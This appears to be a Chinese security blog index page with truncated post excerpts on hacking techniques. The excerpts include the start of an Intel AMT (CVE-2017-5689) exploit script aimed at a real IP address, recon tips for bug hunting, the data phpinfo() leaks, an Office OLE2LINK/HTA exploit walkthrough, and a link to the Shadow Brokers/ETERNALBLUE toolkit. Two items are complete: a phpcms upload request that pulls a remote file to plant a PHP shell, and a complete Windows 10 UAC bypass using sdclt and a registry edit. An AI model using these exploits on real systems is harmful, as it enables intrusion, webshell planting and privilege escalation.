检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm
#!/usr/bin/python
# -*- coding: utf-8 -*-
#by hackteam.cn
import requests
def exploit(url):
status = False
headers = {"User-Agent": "Mozilla/5.0"}
httprsp = requests.get(url, headers=header...阅读全文>>
我平时挖洞的经验,我总结了一下,大概有以下几点:
1、收集信息,尽可能的越多越好(主域名、IP段、搜索引擎、GitHub等)。
2、收集好信息后,对收集的信息进行一些扩展,增加信息收集的量(可以用SubDomain工具批量收集厂商域名信息,域名对应IP,数据多了之后,就可以拿来分析域名的真实地址、以及潜在的IP段)。
3、对IP段、子域名等进行大量破解,这里我们要经常收集一些SRC开发常用的端口、以及一些域名的命名习惯(GitHub上面有很多现成的端口,平时收集信息的时候,可以多注意一下)。
4、收集对方的邮箱账号命名习惯(因为好多官方后台都是用...阅读全文>>
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。
一、绝对路径(_SERVER[“SCRIPT_FILENAME”])
这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。
二、支持的程序
可以通过phpinfo()查...阅读全文>>
漏洞概述
fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。
漏洞利用方法
首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下:
test789
<script>
var objShell = new ActiveXObject("wscript.shell");
objSh...阅读全文>>
方程式0day的下载地址:
https://github.com/misterch0c/shadowbroker
本次公开的工具包中,包含多个 Windows 漏洞的利用工具,只要Windows服务器开了25、88、139、445、3389 等端口之一,就有可能被黑客攻击,其中影响尤为严重的是445和3389端口。
复现过程,收集的网上的(自己电脑太差,虚拟机运行不了那么多。so,看看网上的吧)
方程式 0day ETERNALBLUE 复现过程
视频教程
ETERNALBLUE 本地复...阅读全文>>
1.phpcms文件上传,需要网站开启注册功能
http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1
POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...阅读全文>>
window10:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f阅读全文>>